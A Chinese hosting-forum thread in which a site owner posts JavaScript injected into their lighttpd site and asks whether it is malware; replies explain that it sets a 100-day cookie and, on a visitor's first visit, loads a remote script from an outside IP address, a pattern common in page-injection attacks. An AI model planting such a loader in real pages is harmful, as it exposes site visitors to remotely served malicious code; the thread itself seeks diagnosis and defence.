设为首页收藏本站
切换到宽版

全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 被挂马了,求大神分析这段代码
IP归属甄别会员请立即修改密码
返回列表 发新帖
查看: 1554|回复: 8
打印 上一主题 下一主题

[lighttpd] 被挂马了,求大神分析这段代码

[复制链接]
admip
跳转到指定楼层
1#
发表于 2016-10-15 14:45:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<script type="text/javascript" src="http://103.224.249.13/zx/a.js"></script>


function goad(){
var Then = new Date()
Then.setTime(Then.getTime() + 2400*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
document.write('<script src="http://103.224.249.13/zx/1.js" type=text/javascript></script>');
}
}goad();

这是被挂马了吗
回复

举报

8idc.com
2#
发表于 2016-10-15 15:06:32 来自手机 | 只看该作者
设置含推荐信息的cookies?
回复 支持 反对

举报

单调
3#
发表于 2016-10-15 16:31:11 | 只看该作者
http://103.224.249.13/zx/1.js 这个比较关键
回复 支持 反对

举报

李沁峰
4#
发表于 2016-10-15 16:38:37 | 只看该作者
楼主是不是搞错了,应该找出程序的漏洞才对呀。
回复 支持 反对

举报

jraml
5#
发表于 2016-10-15 17:55:13 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

举报

雨宫音羽
7#
发表于 2016-10-15 18:33:46 | 只看该作者
http://d.86fm.com/appios.asp?ref=18mobappios&pid=7160

获取不到 返回0值 因此不知道这个会返回什么数据

上面的代码的意思是 访客第一次访问后会被设置一个100天长的cookie 当有这个cookie时代码什么都不做 当没有这个cookie时 加载一个http://103.224.249.13/zx/1.js的脚本

也就是防同一个访客多次加载同样脚本的功能。常见于挂马 也可能是用于别的用途
回复 支持 反对

举报

叫妇
8#
发表于 2016-10-15 19:29:36 | 只看该作者
我好像看到了商机

点评

gger
什么商机求带  发表于 2016-10-15 20:56
回复 支持 反对

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-17 03:48 , Processed in 0.093368 second(s), 14 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表